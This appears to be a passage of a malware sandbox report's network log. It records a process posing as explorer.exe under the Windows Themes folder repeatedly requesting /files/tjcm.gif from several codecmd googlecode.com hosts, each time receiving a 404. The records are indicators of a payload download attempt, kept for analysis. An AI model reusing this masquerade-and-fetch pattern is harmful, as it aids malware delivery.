                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          62192.168.2.45685264.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:49.473437071 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:50.208429098 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:50 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:50.208477020 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          63192.168.2.45685566.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:51.059859037 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:51.747670889 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:51 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:51.747725964 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          64192.168.2.45685674.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:52.143656969 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:52.827589989 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:52 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:52.827655077 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          65192.168.2.45685764.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:53.266840935 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:53.986639023 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:53 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:53.986659050 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          66192.168.2.45685866.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:54.366554022 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:55.071510077 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:54 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:55.071530104 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          67192.168.2.45685974.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:55.344947100 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:56.056495905 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:55 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:56.056545019 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          68192.168.2.45686064.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:56.679346085 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:57.383725882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:57 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:57.383753061 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
